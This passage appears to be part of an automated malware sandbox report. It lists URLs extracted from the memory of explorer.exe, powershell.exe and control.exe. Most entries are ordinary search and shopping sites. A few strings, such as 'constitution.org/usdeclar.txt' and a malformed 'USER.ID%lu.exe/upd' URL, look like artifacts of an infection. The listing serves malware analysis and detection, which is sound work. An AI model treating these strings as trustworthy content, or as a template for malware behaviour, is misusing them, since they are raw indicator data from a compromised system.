            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://cnet.search.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
            Source: powershell.exe, 00000016.00000003.506842838.000002656DBD0000.00000004.00000001.sdmp, control.exe, 0000001C.00000002.562589004.0000000000C0E000.00000004.00000001.sdmp, explorer.exe, 0000001F.00000003.509721795.00000000027B0000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
            Source: powershell.exe, 00000016.00000003.506842838.000002656DBD0000.00000004.00000001.sdmp, control.exe, 0000001C.00000002.562589004.0000000000C0E000.00000004.00000001.sdmp, explorer.exe, 0000001F.00000003.509721795.00000000027B0000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://es.ask.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://find.joins.com/
            Source: explorer.exe, 0000001F.00000000.549206559.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
            Source: powershell.exe, 00000016.00000003.506842838.000002656DBD0000.00000004.00000001.sdmp, control.exe, 0000001C.00000002.562589004.0000000000C0E000.00000004.00000001.sdmp, explorer.exe, 0000001F.00000003.509721795.00000000027B0000.00000004.00000001.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
            Source: powershell.exe, 00000016.00000003.464342861.00000265015AE000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
            Source: powershell.exe, 00000016.00000003.463966889.00000265013EA000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://rover.ebay.com
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
            Source: powershell.exe, 00000016.00000002.511106004.0000026500001000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.about.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.in/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.auone.jp/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.de/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.es/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.in/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.it/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.interpark.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.nate.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.nifty.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.sify.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.yam.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://suche.aol.de/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://web.ask.com/
            Source: explorer.exe, 0000001F.00000000.545744038.00000000075A0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.com
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.de/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
            Source: powershell.exe, 00000016.00000003.463561816.000002650102F000.00000004.00000001.sdmp, explorer.exe, 0000001F.00000000.549206559.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: powershell.exe, 00000016.00000003.463966889.00000265013EA000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.ask.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
            Source: explorer.exe, 0000001F.00000002.604333034.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.549206559.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.docUrl.com/bar.htm
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.549206559.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: explorer.exe, 0000001F.00000000.549206559.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: explorer.exe, 0000001F.00000000.549206559.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: explorer.exe, 0000001F.00000000.549206559.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: explorer.exe, 0000001F.00000000.549206559.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
            Source: explorer.exe, 0000001F.00000000.549206559.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: explorer.exe, 0000001F.00000000.549206559.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: explorer.exe, 0000001F.00000000.549206559.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: explorer.exe, 0000001F.00000000.549206559.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
            Source: explorer.exe, 0000001F.00000000.549206559.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: explorer.exe, 0000001F.00000000.549206559.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
